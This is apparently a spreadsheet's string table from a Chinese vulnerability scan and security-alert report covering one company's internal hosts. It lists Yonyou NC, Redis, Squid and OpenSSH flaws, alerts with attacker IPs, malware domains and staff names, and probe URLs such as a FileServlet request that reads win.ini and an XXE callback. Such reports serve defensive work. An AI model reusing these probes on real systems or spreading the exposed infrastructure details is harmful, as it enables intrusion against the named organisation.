    <t>https://172.16.5.61:443</t>
  </si>
  <si>
    <t>http://172.16.5.61:8081</t>
  </si>
  <si>
    <t>http://172.16.6.20:80</t>
  </si>
  <si>
    <t>http://172.16.6.41:6060/debug/pprof/</t>
  </si>
  <si>
    <t>http://172.16.5.75:9081/</t>
  </si>
  <si>
    <t>http://172.16.6.41:9501/dockerfile</t>
  </si>
  <si>
    <t>http://172.16.6.41:9502/dockerfile</t>
  </si>
  <si>
    <t>http://172.16.6.43:4040/</t>
  </si>
  <si>
    <t>http://172.16.6.43:9502/dockerfile</t>
  </si>
  <si>
    <t>http://172.16.6.43:9501/dockerfile</t>
  </si>
  <si>
    <t>http://172.16.6.43:6060/debug/pprof/</t>
  </si>
  <si>
    <t>http://172.16.6.42:9501/dockerfile</t>
  </si>
  <si>
    <t>http://172.16.6.42:9502/dockerfile</t>
  </si>
  <si>
    <t>http://172.16.6.42:6060/debug/pprof/</t>
  </si>
  <si>
    <t>用友UFIDA NC service信息泄露漏洞</t>
  </si>
  <si>
    <t>http://172.16.5.20:8000/uapws/service</t>
  </si>
  <si>
    <t>远程攻击者可以使用此漏洞获取敏感信息</t>
  </si>
  <si>
    <t>请联系厂商获取补丁https://www.yonyou.com</t>
  </si>
  <si>
    <t>http://172.16.5.20:80/</t>
  </si>
  <si>
    <t>用友NC6.5 反序列化命令执行漏洞</t>
  </si>
  <si>
    <t>ips-11024785（有效）</t>
  </si>
  <si>
    <t>http://172.16.5.20:8000/service/monitorservlet</t>
  </si>
  <si>
    <t>利用该漏洞可以造成命令执行，从而控制服务器。</t>
  </si>
  <si>
    <t>请联系产商及时更新版本，官方地址：http://www.yonyou.com/</t>
  </si>
  <si>
    <t>https://blog.csdn.net/weixin_42345596/article/details/118803421</t>
  </si>
  <si>
    <t>用友GRP-U8 FileServlet 任意文件读取漏洞</t>
  </si>
  <si>
    <t>http://172.16.5.20:8000/service/~hrpub/nc.bs.hr.tools.trans.FileServlet?path=QzovL3dpbmRvd3Mvd2luLmluaQ==</t>
  </si>
  <si>
    <t>官方已发布安全修复版本，请升级至官网最新版本</t>
  </si>
  <si>
    <t>https://security.yonyou.com/</t>
  </si>
  <si>
    <t>用友NC BeanShell 远程代码执行漏洞</t>
  </si>
  <si>
    <t>ips-11021543, ips-11021544（有效）</t>
  </si>
  <si>
    <t>http://172.16.5.20:8000/servlet/~ic/bsh.servlet.BshServlet</t>
  </si>
  <si>
    <t>NC6.5版本</t>
  </si>
  <si>
    <t>用友NC官方已于4月9日解决并验证，且已通过服务渠道推送了解决方案，授权用户可以访问下载链接进行下载              http://umc.yonyou.com/ump/querypatchdetailedmng?PK=18981c7af483007db179a236016f594d37c01f22aa5f5d19</t>
  </si>
  <si>
    <t>用友GRP-U8 Cloud nc.itf.bd.crm.IInvclExportToCrmService XXE 漏洞</t>
  </si>
  <si>
    <t>ips-11026621（有效）</t>
  </si>
  <si>
    <t>http://172.16.5.20:8000/uapws/service/nc.itf.bd.crm.IInvclExportToCrmService?xsd=http://172.16.6.200:8082/rand_str/cMIyaab</t>
  </si>
  <si>
    <t>//172.16.6.200</t>
  </si>
  <si>
    <t>8082/rand_str/cMIyaab</t>
  </si>
  <si>
    <t>ips-11021543（有效）</t>
  </si>
  <si>
    <t>用友NC BeanShell存在远程代码执行漏洞。攻击者可利用该漏洞在未授权的情况下，构造恶意数据，进行任意代码，最终获取服务器最高权限。</t>
  </si>
  <si>
    <t>用友NC官方已于4月9日解决并验证，且已通过服务渠道推送了解决方案，授权用户可以访问下载链接进行下载http://umc.yonyou.com/ump/querypatchdetailedmng?PK=18981c7af483007db179a236016f594d37c01f22aa5f5d19</t>
  </si>
  <si>
    <t>https://www.cnblogs.com/Eleven-Liu/p/14856481.html
www.yonyou.com/</t>
  </si>
  <si>
    <t>用友产品信息泄露漏洞</t>
  </si>
  <si>
    <t>ips-11024938（有效）</t>
  </si>
  <si>
    <t>http://172.16.5.20:8000/NCFindWeb</t>
  </si>
  <si>
    <t>用友ERP-NC</t>
  </si>
  <si>
    <t>下载最新版本，用友官网链接:http://www.yonyou.com/</t>
  </si>
  <si>
    <t>http://172.16.5.83:9020/</t>
  </si>
  <si>
    <t>http://172.16.5.31:88/</t>
  </si>
  <si>
    <t>https://172.16.5.31:9443/</t>
  </si>
  <si>
    <t>http://172.16.5.21:80</t>
  </si>
  <si>
    <t>伪来源ip地址的dns远程攻击漏洞(CVE-2006-0987)</t>
  </si>
  <si>
    <t>远程攻击者可以利用此漏洞进行拒绝服务攻击</t>
  </si>
  <si>
    <t>1.建议对于无意义的查询，不回复任何响应。2.限制ip访问3.禁用DNS递归查询4.针对bind ,配置ACL策略，参考链接：https://kb.isc.org/docs/aa-00269</t>
  </si>
  <si>
    <t>https://kb.isc.org/docs/aa-00269</t>
  </si>
  <si>
    <t>http://172.16.5.21:80/iisstart.htm</t>
  </si>
  <si>
    <t>http://172.16.5.21:80/</t>
  </si>
  <si>
    <t>Java 管理扩展 (JMX/RMI) 服务被发现</t>
  </si>
  <si>
    <t>http://172.16.5.35:1099/</t>
  </si>
  <si>
    <t>1099</t>
  </si>
  <si>
    <t>此漏洞没有较大影响。</t>
  </si>
  <si>
    <t>在生产系统中，建议不要公开提供JMX/RMI服务。 对此服务的访问应受到限制。</t>
  </si>
  <si>
    <t>http://en.wikipedia.org/wiki/Java_Management_Extensions</t>
  </si>
  <si>
    <t>Redis输出缓冲区内存耗尽漏洞（CVE-2025-21605）</t>
  </si>
  <si>
    <t>影响Redis:2.6版本(含)到7.4.3版本</t>
  </si>
  <si>
    <t>官方已发布安全更新，建议受影响用户尽快升级至Redis 7.4.3版本。</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2025-21605
https://github.com/redis/redis/releases/tag/7.4.3</t>
  </si>
  <si>
    <t>Redis HyperLogLog越界写入致代码执行漏洞(CVE-2025-32023)</t>
  </si>
  <si>
    <t>影响Redis:8.0.0版本(含)到8.0.3版本,7.4.0版本(含)到7.4.5版本,7.2.0版本(含)到7.2.10版本,2.8.0版本(含)到6.2.19版本</t>
  </si>
  <si>
    <t>官方已发布最新版本修复该漏洞，建议受影响用户将redis更新到以下版本。 redis 8.0升级至 8.0.3 及以上版本 redis 7.2升级至 7.2.10 及以上版本 redis 7.4升级至 7.4.5 及以上版本 低版本redis 升级至 6.2.19 及以上版本 参考链接：https://github.com/redis/redis/releases</t>
  </si>
  <si>
    <t>https://github.com/redis/redis/security/advisories/GHSA-rp2m-q4j6-gr43
https://github.com/redis/redis/releases/tag/7.2.10</t>
  </si>
  <si>
    <t>4545</t>
  </si>
  <si>
    <t>Squid 安全漏洞(CVE-2023-46846)</t>
  </si>
  <si>
    <t>3128</t>
  </si>
  <si>
    <t>Squid: 6.14-VCS</t>
  </si>
  <si>
    <t>影响Squid:2.6版本(含)到6.4版本</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://github.com/squid-cache/squid/releases/tag/SQUID_6_4</t>
  </si>
  <si>
    <t>Squid 安全漏洞(CVE-2023-5824)</t>
  </si>
  <si>
    <t>影响Squid:6.4以下版本</t>
  </si>
  <si>
    <t>Squid 安全漏洞(CVE-2024-23638)</t>
  </si>
  <si>
    <t>影响Squid:5.0版本(含)到5.9版本,6.0版本(含)到6.6版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接:http://www.squid-cache.org/Versions/v6/SQUID-2023_11.patch</t>
  </si>
  <si>
    <t>Squid 安全漏洞(CVE-2023-46847)</t>
  </si>
  <si>
    <t>影响Squid:3.2.0.1.3版本(含)到6.4版本</t>
  </si>
  <si>
    <t>Squid 安全漏洞(CVE-2023-46848)</t>
  </si>
  <si>
    <t>影响Squid:5.0.3版本(含)到6.4版本</t>
  </si>
  <si>
    <t>Squid 代码问题漏洞(CVE-2023-46728)</t>
  </si>
  <si>
    <t>影响Squid:6.0.1以下版本</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://github.com/squid-cache/squid/security/advisories/GHSA-cg5h-v6vc-w33f</t>
  </si>
  <si>
    <t>Squid 安全漏洞(CVE-2023-46724)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://github.com/squid-cache/squid/security/advisories/GHSA-73m6-jm96-c6r3</t>
  </si>
  <si>
    <t>http://192.168.1.110:4545</t>
  </si>
  <si>
    <t>http://192.168.1.110:4545/</t>
  </si>
  <si>
    <t>http://192.168.22.201:3128</t>
  </si>
  <si>
    <t>http://192.168.1.109:6000/actuator/health</t>
  </si>
  <si>
    <t>OpenSSH 安全漏洞（CVE-2025-26465）</t>
  </si>
  <si>
    <t>影响OpenSSH:9.9p2以下版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了相关信息和参考修复方案，获取链接:https://www.openssh.com/security.html</t>
  </si>
  <si>
    <t>OpenSSH（OpenBSD Secure Shell）安全漏洞（CVE-2025-32728）</t>
  </si>
  <si>
    <t>影响OpenSSH:10.0p1以下版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了相关信息和参考修复方案，获取链接:https://lists.mindrot.org/pipermail/openssh-unix-dev/2025-April/041879.html</t>
  </si>
  <si>
    <t>https://lists.mindrot.org/pipermail/openssh-unix-dev/2025-April/041879.html</t>
  </si>
  <si>
    <t>用友NC saveDoc.ajax 任意文件上传漏洞</t>
  </si>
  <si>
    <t>ips-11026655（有效）</t>
  </si>
  <si>
    <t>http://172.16.5.20:8000/</t>
  </si>
  <si>
    <t>远程攻击者可以利用此漏洞上传任意文件</t>
  </si>
  <si>
    <t>8088</t>
  </si>
  <si>
    <t>http://172.16.5.13:8088</t>
  </si>
  <si>
    <t>https://172.16.5.13:1158</t>
  </si>
  <si>
    <t>Redis Lua脚本远程代码执行漏洞(CVE-2025-49844)</t>
  </si>
  <si>
    <t>影响Redis:6.2.20版本以前，7.0.0版本(含)到7.2.11版本,7.4.0版本(含)到7.4.6版本,8.0.0版本(含)到8.0.4版本,8.2.0版本(含)到8.2.2版本</t>
  </si>
  <si>
    <t>官方已修复最新版本修复该漏洞，建议受影响的Redis用户更新到以下版本。 Redis 6.2.20 Redis 7.2.11 Redis 7.4.6 Redis 8.0.4 Redis 8.2.2 下载链接：https://github.com/redis/redis/releases/tag</t>
  </si>
  <si>
    <t>https://github.com/redis/redis/releases/tag</t>
  </si>
  <si>
    <t>XX9362</t>
  </si>
  <si>
    <t>http://*.*.5.21:80</t>
  </si>
  <si>
    <t>*.*.5.21</t>
  </si>
  <si>
    <t>XX9363</t>
  </si>
  <si>
    <t>已防护</t>
  </si>
  <si>
    <t>XX9364</t>
  </si>
  <si>
    <t>XX9365</t>
  </si>
  <si>
    <t>XX9366</t>
  </si>
  <si>
    <t>XX9367</t>
  </si>
  <si>
    <t>XX9368</t>
  </si>
  <si>
    <t>XX9369</t>
  </si>
  <si>
    <t>XX9370</t>
  </si>
  <si>
    <t>XX9371</t>
  </si>
  <si>
    <t>XX9372</t>
  </si>
  <si>
    <t>http://*.*.5.21:80/iisstart.htm</t>
  </si>
  <si>
    <t>XX9373</t>
  </si>
  <si>
    <t>XX9374</t>
  </si>
  <si>
    <t>http://*.*.5.21:80/</t>
  </si>
  <si>
    <t>XX9375</t>
  </si>
  <si>
    <t>XX9376</t>
  </si>
  <si>
    <t>*.*.5.35</t>
  </si>
  <si>
    <t>XX9377</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201608-448
https://sweet32.info/
http://www.securitytracker.com/id/1036696</t>
  </si>
  <si>
    <t>XX9378</t>
  </si>
  <si>
    <t>XX9379</t>
  </si>
  <si>
    <t>XX9380</t>
  </si>
  <si>
    <t>http://*.*.5.35:1099/</t>
  </si>
  <si>
    <t>XX9381</t>
  </si>
  <si>
    <t>XX9382</t>
  </si>
  <si>
    <t>XX9383</t>
  </si>
  <si>
    <t>XX9384</t>
  </si>
  <si>
    <t>*.*.4.203</t>
  </si>
  <si>
    <t>XX9385</t>
  </si>
  <si>
    <t>*.*.4.204</t>
  </si>
  <si>
    <t>XX9386</t>
  </si>
  <si>
    <t>*.*.34.110</t>
  </si>
  <si>
    <t>XX9387</t>
  </si>
  <si>
    <t>XX9388</t>
  </si>
  <si>
    <t>*.*.1.110</t>
  </si>
  <si>
    <t>XX9389</t>
  </si>
  <si>
    <t>*.*.1.108</t>
  </si>
  <si>
    <t>XX9390</t>
  </si>
  <si>
    <t>XX9391</t>
  </si>
  <si>
    <t>*.*.4.219</t>
  </si>
  <si>
    <t>XX9392</t>
  </si>
  <si>
    <t>XX9393</t>
  </si>
  <si>
    <t>XX9394</t>
  </si>
  <si>
    <t>XX9395</t>
  </si>
  <si>
    <t>XX9396</t>
  </si>
  <si>
    <t>XX9397</t>
  </si>
  <si>
    <t>XX9398</t>
  </si>
  <si>
    <t>XX9399</t>
  </si>
  <si>
    <t>XX9400</t>
  </si>
  <si>
    <t>XX9401</t>
  </si>
  <si>
    <t>XX9402</t>
  </si>
  <si>
    <t>XX9403</t>
  </si>
  <si>
    <t>XX9404</t>
  </si>
  <si>
    <t>XX9405</t>
  </si>
  <si>
    <t>XX9406</t>
  </si>
  <si>
    <t>XX9407</t>
  </si>
  <si>
    <t>XX9408</t>
  </si>
  <si>
    <t>XX9409</t>
  </si>
  <si>
    <t>XX9410</t>
  </si>
  <si>
    <t>XX9411</t>
  </si>
  <si>
    <t>XX9412</t>
  </si>
  <si>
    <t>XX9413</t>
  </si>
  <si>
    <t>XX9414</t>
  </si>
  <si>
    <t>XX9415</t>
  </si>
  <si>
    <t>*.*.1.109</t>
  </si>
  <si>
    <t>XX9416</t>
  </si>
  <si>
    <t>XX9417</t>
  </si>
  <si>
    <t>XX9418</t>
  </si>
  <si>
    <t>XX9419</t>
  </si>
  <si>
    <t>*.*.22.201</t>
  </si>
  <si>
    <t>Squid: 5.5</t>
  </si>
  <si>
    <t>XX9420</t>
  </si>
  <si>
    <t>XX9421</t>
  </si>
  <si>
    <t>XX9422</t>
  </si>
  <si>
    <t>XX9423</t>
  </si>
  <si>
    <t>XX9424</t>
  </si>
  <si>
    <t>XX9425</t>
  </si>
  <si>
    <t>XX9426</t>
  </si>
  <si>
    <t>XX9427</t>
  </si>
  <si>
    <t>XX9428</t>
  </si>
  <si>
    <t>XX9429</t>
  </si>
  <si>
    <t>XX9430</t>
  </si>
  <si>
    <t>XX9431</t>
  </si>
  <si>
    <t>http://*.*.1.110:4545</t>
  </si>
  <si>
    <t>XX9432</t>
  </si>
  <si>
    <t>XX9433</t>
  </si>
  <si>
    <t>XX9434</t>
  </si>
  <si>
    <t>XX9435</t>
  </si>
  <si>
    <t>XX9436</t>
  </si>
  <si>
    <t>XX9437</t>
  </si>
  <si>
    <t>XX9438</t>
  </si>
  <si>
    <t>XX9439</t>
  </si>
  <si>
    <t>http://*.*.1.110:4545/</t>
  </si>
  <si>
    <t>XX9440</t>
  </si>
  <si>
    <t>http://*.*.22.201:3128</t>
  </si>
  <si>
    <t>XX9441</t>
  </si>
  <si>
    <t>XX9442</t>
  </si>
  <si>
    <t>XX9443</t>
  </si>
  <si>
    <t>XX9444</t>
  </si>
  <si>
    <t>XX9445</t>
  </si>
  <si>
    <t>XX9446</t>
  </si>
  <si>
    <t>XX9447</t>
  </si>
  <si>
    <t>XX9448</t>
  </si>
  <si>
    <t>http://*.*.1.109:9992</t>
  </si>
  <si>
    <t>XX9449</t>
  </si>
  <si>
    <t>XX9450</t>
  </si>
  <si>
    <t>http://*.*.1.109:6000/actuator/health</t>
  </si>
  <si>
    <t>XX9451</t>
  </si>
  <si>
    <t>http://*.*.4.203:9992</t>
  </si>
  <si>
    <t>XX9452</t>
  </si>
  <si>
    <t>XX9453</t>
  </si>
  <si>
    <t>http://*.*.4.204:9992</t>
  </si>
  <si>
    <t>XX9454</t>
  </si>
  <si>
    <t>告警名称</t>
  </si>
  <si>
    <t>告警优先级</t>
  </si>
  <si>
    <t>主机IP</t>
  </si>
  <si>
    <t>威胁类型</t>
  </si>
  <si>
    <t>告警状态</t>
  </si>
  <si>
    <t>告警ID</t>
  </si>
  <si>
    <t>服务组</t>
  </si>
  <si>
    <t>主机名称</t>
  </si>
  <si>
    <t>设备</t>
  </si>
  <si>
    <t>IOC</t>
  </si>
  <si>
    <t>告警标签</t>
  </si>
  <si>
    <t>首次触发时间</t>
  </si>
  <si>
    <t>最近触发时间</t>
  </si>
  <si>
    <t>处理人</t>
  </si>
  <si>
    <t>事件ID</t>
  </si>
  <si>
    <t>威胁等级</t>
  </si>
  <si>
    <t>失陷情况</t>
  </si>
  <si>
    <t>源IP</t>
  </si>
  <si>
    <t>目的IP</t>
  </si>
  <si>
    <t>XFF IP</t>
  </si>
  <si>
    <t>USECASE ID</t>
  </si>
  <si>
    <t>服务类型</t>
  </si>
  <si>
    <t>资产类别</t>
  </si>
  <si>
    <t>资产信息</t>
  </si>
  <si>
    <t>服务经理</t>
  </si>
  <si>
    <t>创建时间</t>
  </si>
  <si>
    <t>实际处理人</t>
  </si>
  <si>
    <t>同步状态</t>
  </si>
  <si>
    <t>场景标签</t>
  </si>
  <si>
    <t>攻击结果</t>
  </si>
  <si>
    <t>访问方向</t>
  </si>
  <si>
    <t>确定性等级</t>
  </si>
  <si>
    <t>审核时长</t>
  </si>
  <si>
    <t>操作时间</t>
  </si>
  <si>
    <t>任务名称</t>
  </si>
  <si>
    <t>sip联动状态</t>
  </si>
  <si>
    <t>源端口</t>
  </si>
  <si>
    <t>目的端口</t>
  </si>
  <si>
    <t>协议</t>
  </si>
  <si>
    <t>审核id</t>
  </si>
  <si>
    <t>拦截情况</t>
  </si>
  <si>
    <t>Sla</t>
  </si>
  <si>
    <t>审核到期时间</t>
  </si>
  <si>
    <t>可信度</t>
  </si>
  <si>
    <t>驳回事件ID</t>
  </si>
  <si>
    <t>驳回人</t>
  </si>
  <si>
    <t>驳回原因</t>
  </si>
  <si>
    <t>主机遭受web攻击</t>
  </si>
  <si>
    <t>中</t>
  </si>
  <si>
    <t>外部威胁&gt;web攻击</t>
  </si>
  <si>
    <t>已忽略（自动）</t>
  </si>
  <si>
    <t>69b935d28ccf7e4eb1e4b944</t>
  </si>
  <si>
    <t>价值交付三组</t>
  </si>
  <si>
    <t>sta</t>
  </si>
  <si>
    <t>oa.haiheangroup.com:88/emp/api/log/record</t>
  </si>
  <si>
    <t>自定义usecase、安全分析中台引擎</t>
  </si>
  <si>
    <t>李想</t>
  </si>
  <si>
    <t>223.105.69.200</t>
  </si>
  <si>
    <t>T20240118201716341</t>
  </si>
  <si>
    <t>服务内 (7*24H)</t>
  </si>
  <si>
    <t>上海园区MSS资产&gt;泛微oa系统-应用服务器</t>
  </si>
  <si>
    <t>郭永斌</t>
  </si>
  <si>
    <t>正常</t>
  </si>
  <si>
    <t>失败</t>
  </si>
  <si>
    <t>外-内</t>
  </si>
  <si>
    <t>0天0时0分2秒</t>
  </si>
  <si>
    <t>http</t>
  </si>
  <si>
    <t>全部未知</t>
  </si>
  <si>
    <t>30min</t>
  </si>
  <si>
    <t>高可信</t>
  </si>
  <si>
    <t>泛微OA后台管理页面暴露在公网</t>
  </si>
  <si>
    <t>低</t>
  </si>
  <si>
    <t>脆弱性&gt;敏感页面暴露</t>
  </si>
  <si>
    <t>69b91cf4741d8d2486b94e68</t>
  </si>
  <si>
    <t>oa.haiheangroup.com:8788/api/hrm/login/checkLogin</t>
  </si>
  <si>
    <t>脆弱性、安全分析中台引擎</t>
  </si>
  <si>
    <t>姚金鑫</t>
  </si>
  <si>
    <t>T20221108090812259</t>
  </si>
  <si>
    <t>MSSP</t>
  </si>
  <si>
    <t>成功</t>
  </si>
  <si>
    <t>0天0时0分1秒</t>
  </si>
  <si>
    <t>54470</t>
  </si>
  <si>
    <t>8788</t>
  </si>
  <si>
    <t>67f76f1630da8824bbe523c5</t>
  </si>
  <si>
    <t>中可信</t>
  </si>
  <si>
    <t>弱口令登录成功</t>
  </si>
  <si>
    <t>脆弱性&gt;账号安全</t>
  </si>
  <si>
    <t>69b80810444e5db4916e0a76</t>
  </si>
  <si>
    <t>安全分析中台引擎</t>
  </si>
  <si>
    <t>60.209.202.180</t>
  </si>
  <si>
    <t>T20240625103030429</t>
  </si>
  <si>
    <t>665f1228c5c67f4645b0a64b</t>
  </si>
  <si>
    <t>69b91b6553b3105a30007dec</t>
  </si>
  <si>
    <t>af</t>
  </si>
  <si>
    <t>oa.haiheangroup.com:8788/api/systemViewLog/home/InsertSystemPageViewLog</t>
  </si>
  <si>
    <t>安宏祥</t>
  </si>
  <si>
    <t>0天0时0分3秒</t>
  </si>
  <si>
    <t>主机存在感染挖矿家族minepool</t>
  </si>
  <si>
    <t>内部威胁&gt;挖矿</t>
  </si>
  <si>
    <t>69b7b5e2a56cdc6fb96705fd</t>
  </si>
  <si>
    <t>XDR_af</t>
  </si>
  <si>
    <t>waterhole.io</t>
  </si>
  <si>
    <t>APEX-GPT引擎</t>
  </si>
  <si>
    <t>高</t>
  </si>
  <si>
    <t>219.147.1.66</t>
  </si>
  <si>
    <t xml:space="preserve"> -</t>
  </si>
  <si>
    <t>8eae36450000</t>
  </si>
  <si>
    <t>天津园区MSS资产&gt;青岛办公pc或监控</t>
  </si>
  <si>
    <t>失陷</t>
  </si>
  <si>
    <t>内-外</t>
  </si>
  <si>
    <t>0天0时0分5秒</t>
  </si>
  <si>
    <t>51847</t>
  </si>
  <si>
    <t>udp</t>
  </si>
  <si>
    <t>66ac46f31af7a614fd65393e</t>
  </si>
  <si>
    <t>69b7c941741d8d2486b92737</t>
  </si>
  <si>
    <t>62355</t>
  </si>
  <si>
    <t>69b8aab18ccf7e4eb1e4a655</t>
  </si>
  <si>
    <t>涂峰川</t>
  </si>
  <si>
    <t>69b91630a396910f1b778dc6</t>
  </si>
  <si>
    <t>223.105.69.206</t>
  </si>
  <si>
    <t>69b9024944107df81566f917</t>
  </si>
  <si>
    <t>0天0时0分8秒</t>
  </si>
  <si>
    <t>69b90b8da0e97d17dfae9512</t>
  </si>
  <si>
    <t>0天0时0分10秒</t>
  </si>
  <si>
    <t>69b90ae9741d8d2486b94bf3</t>
  </si>
  <si>
    <t>69b90aa6b3f2e004b99c9a1d</t>
  </si>
  <si>
    <t>0天0时0分9秒</t>
  </si>
  <si>
    <t>69b90a547497cd0e21ae9886</t>
  </si>
  <si>
    <t>69b909bab3f2e004b99c99f4</t>
  </si>
  <si>
    <t>tdyy.haiheangroup.com:9443/fort/system;help/node_management/save_strategy</t>
  </si>
  <si>
    <t>223.104.43.33</t>
  </si>
  <si>
    <t>未知</t>
  </si>
  <si>
    <t>上海园区MSS资产&gt;深信服堡垒机</t>
  </si>
  <si>
    <t>待研判</t>
  </si>
  <si>
    <t>https</t>
  </si>
  <si>
    <t>69b906c944107df81566f9d3</t>
  </si>
  <si>
    <t>oa.haiheangroup.com:8788/api/integration/workflowflow/getInterfaceRegisterDMLAddForm</t>
  </si>
  <si>
    <t>60.175.115.106</t>
  </si>
  <si>
    <t>69b8fed044107df81566f89e</t>
  </si>
  <si>
    <t>60.28.99.74:8443/fort/system;help/node_management/save_strategy</t>
  </si>
  <si>
    <t>27.10.117.145</t>
  </si>
  <si>
    <t>127.0.0.1</t>
  </si>
  <si>
    <t>天津园区MSS资产&gt;天津堡垒机</t>
  </si>
  <si>
    <t>69b8fa66a0e97d17dfae92bc</t>
  </si>
  <si>
    <t>60.30.190.26</t>
  </si>
  <si>
    <t>69b8f43c53b3105a300078aa</t>
  </si>
  <si>
    <t>0天0时0分4秒</t>
  </si>
  <si>
    <t>主机存在感染僵尸网络家族malware</t>
  </si>
  <si>
    <t>内部威胁&gt;僵尸网络</t>
  </si>
  <si>
    <t>69b8aaad120308c7598820d0</t>
  </si>
  <si>
    <t>XDR_sta</t>
  </si>
  <si>
    <t>137.220.135.153:5178</t>
  </si>
  <si>
    <t>已失陷</t>
  </si>
  <si>
    <t>137.220.135.153</t>
  </si>
  <si>
    <t>2e3269e10000</t>
  </si>
  <si>
    <t>天津园区MSS资产&gt;资产发现系统默认分组</t>
  </si>
  <si>
    <t>55430</t>
  </si>
  <si>
    <t>5178</t>
  </si>
  <si>
    <t>tcp</t>
  </si>
  <si>
    <t>主机存在感染木马远控家族silverfox</t>
  </si>
  <si>
    <t>内部威胁&gt;木马</t>
  </si>
  <si>
    <t>69b8aa6ec87d3abad4f8dfec</t>
  </si>
  <si>
    <t>dashenbaba9.com</t>
  </si>
  <si>
    <t>114.114.114.114</t>
  </si>
  <si>
    <t>8ebd452b0000</t>
  </si>
  <si>
    <t>61027</t>
  </si>
  <si>
    <t>dns</t>
  </si>
  <si>
    <t>69b8f1b210edc44512ac3668</t>
  </si>
  <si>
    <t>192.168.0.109:8017/login</t>
  </si>
  <si>
    <t>192.168.0.195</t>
  </si>
  <si>
    <t>天津园区MSS资产&gt;主应用服务器-1</t>
  </si>
  <si>
    <t>内-内</t>
  </si>
  <si>
    <t>69b8e8970baeeb9910a7b2c3</t>
  </si>
  <si>
    <t>69b8e41eb3f2e004b99c94af</t>
  </si>
  <si>
    <t>122.190.135.5</t>
  </si>
  <si>
    <t>69b8e40b741d8d2486b946aa</t>
  </si>
  <si>
    <t>69b8e00d444e5db4916e21de</t>
  </si>
  <si>
    <t>60.27.106.163</t>
  </si>
  <si>
    <t>69b8d569f918f92f09e1d516</t>
  </si>
  <si>
    <t>69b7857d10edc44512ac0d36</t>
  </si>
  <si>
    <t>192.168.0.218</t>
  </si>
  <si>
    <t>69b8cf5ee4fad79a6e556f18</t>
  </si>
  <si>
    <t>222.92.117.175:9443/fort/system;help/node_management/save_strategy</t>
  </si>
  <si>
    <t>111.21.6.82</t>
  </si>
  <si>
    <t>69b8cb6844107df81566f203</t>
  </si>
  <si>
    <t>69b8caedb3f2e004b99c9199</t>
  </si>
  <si>
    <t>175.166.166.91</t>
  </si>
  <si>
    <t>69b8c8b1910349744ff3133b</t>
  </si>
  <si>
    <t>69b8bdd2f918f92f09e1d1a1</t>
  </si>
  <si>
    <t>69b8bb1253b3105a3000710d</t>
  </si>
  <si>
    <t>69b8b9f1f918f92f09e1d0ec</t>
  </si>
  <si>
    <t>69b8b2fc10edc44512ac2d3b</t>
  </si>
  <si>
    <t>219.147.9.110:8443/fort/system;help/node_management/save_strategy</t>
  </si>
  <si>
    <t>220.196.193.33</t>
  </si>
  <si>
    <t>天津园区MSS资产&gt;青岛堡垒机</t>
  </si>
  <si>
    <t>69b8ae96b3f2e004b99c8c7d</t>
  </si>
  <si>
    <t>69b8ad4e444e5db4916e1a06</t>
  </si>
  <si>
    <t>36.106.148.232</t>
  </si>
  <si>
    <t>69b8ad52a0e97d17dfae878f</t>
  </si>
  <si>
    <t>69b8a8d353b3105a30006df8</t>
  </si>
  <si>
    <t>69b8a84bb3f2e004b99c8b6b</t>
  </si>
  <si>
    <t>60.28.99.74:8443/fort/system;help/netConfig/change_net</t>
  </si>
  <si>
    <t>223.104.161.164</t>
  </si>
  <si>
    <t>69af6fd9ac6ecec3800031db</t>
  </si>
  <si>
    <t>223.5.5.5</t>
  </si>
  <si>
    <t>54564</t>
  </si>
  <si>
    <t>69b8a7650baeeb9910a7a8dd</t>
  </si>
  <si>
    <t>杨美钞</t>
  </si>
  <si>
    <t>69b8a6e745595bae97b099ab</t>
  </si>
  <si>
    <t>69b8a68a910349744ff30da2</t>
  </si>
  <si>
    <t>已驳回</t>
  </si>
  <si>
    <t>69b7549f0baeeb9910a782a3</t>
  </si>
  <si>
    <t>PE</t>
  </si>
  <si>
    <t>E26031104746</t>
  </si>
  <si>
    <t>业务触发</t>
  </si>
  <si>
    <t>AF设备离线</t>
  </si>
  <si>
    <t>策略调优&gt;设备离线</t>
  </si>
  <si>
    <t>已完成</t>
  </si>
  <si>
    <t>69b86d7f77ca4c920c53d68a</t>
  </si>
  <si>
    <t>设备离线</t>
  </si>
  <si>
    <t>上海园区MSS资产</t>
  </si>
  <si>
    <t>低可信</t>
  </si>
  <si>
    <t>0.0.0.0</t>
  </si>
  <si>
    <t>69b862744164fc338412e40d</t>
  </si>
  <si>
    <t>未归类组</t>
  </si>
  <si>
    <t>69b861474164fc338412e38f</t>
  </si>
  <si>
    <t>69b85fe477ca4c920c53cf67</t>
  </si>
  <si>
    <t>69b854a8b8cf5597ebb9f7e3</t>
  </si>
  <si>
    <t>武汉园区</t>
  </si>
  <si>
    <t>69b811af10edc44512ac1cf3</t>
  </si>
  <si>
    <t>27.17.239.174</t>
  </si>
  <si>
    <t>69b8048253b3105a30005f51</t>
  </si>
  <si>
    <t>223.105.69.203</t>
  </si>
  <si>
    <t>69b7de30a0e97d17dfae73b2</t>
  </si>
  <si>
    <t>69b7d89734c7f5b2cf44e0a1</t>
  </si>
  <si>
    <t>58.210.102.54</t>
  </si>
  <si>
    <t>69b7d63a4cef246aae946d5c</t>
  </si>
  <si>
    <t>69b7d55144107df81566d77b</t>
  </si>
  <si>
    <t>0天0时0分7秒</t>
  </si>
  <si>
    <t>69af702d02504307e6bb58e6</t>
  </si>
  <si>
    <t>57776</t>
  </si>
  <si>
    <t>69b7cac534c7f5b2cf44df18</t>
  </si>
  <si>
    <t>49.93.49.0</t>
  </si>
  <si>
    <t>主机存在感染钓鱼软件家族phishing</t>
  </si>
  <si>
    <t>内部威胁&gt;钓鱼网站</t>
  </si>
  <si>
    <t>69b7c877998f55ce51ba602b</t>
  </si>
  <si>
    <t>js.amy-cdn.cyou</t>
  </si>
  <si>
    <t>8ebcd8ca0000</t>
  </si>
  <si>
    <t>51390</t>
  </si>
  <si>
    <t>69b7c0db45595bae97b083cc</t>
  </si>
  <si>
